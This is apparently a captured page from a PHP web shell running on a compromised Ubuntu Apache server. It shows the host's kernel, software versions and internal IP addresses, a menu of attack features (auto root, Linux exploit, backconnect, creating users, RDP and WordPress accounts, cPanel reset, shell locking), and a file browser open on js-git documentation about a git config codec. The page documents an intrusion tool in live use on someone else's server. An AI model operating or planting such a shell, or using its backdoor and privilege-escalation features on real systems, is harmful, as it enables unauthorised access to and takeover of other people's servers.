Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
js-git /
doc /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
config-codec.md
833
B
-rw-rw-r--
deflate.md
284
B
-rw-rw-r--
inflate-stream.md
526
B
-rw-rw-r--
inflate.md
238
B
-rw-rw-r--
object-codec.md
3.63
KB
-rw-rw-r--
pack-codec.md
2.62
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config-codec.md
# Config Codec This module implements a codec for reading and writing git config files (this includes the .gitmodules file). As far as I can tell, this is a variant of the INI format. ## codec.decode(ini) -> config Given the text of the config file, return the data as an object. The following config: ```ini [user] name = Tim Caswell email = tim@creationix.com [color] ui = true [color "branch"] current = yellow bold local = green bold remote = cyan bold ``` Will parse to this js object ```js { user: { name: "Tim Caswell", email: "tim@creationix.com" }, color: { ui: "true", branch: { current: "yellow bold", local: "green bold", remote: "cyan bold" } } } ``` ## codec.encode(config) -> ini This reverses the conversion and writes a string from a config object.
Close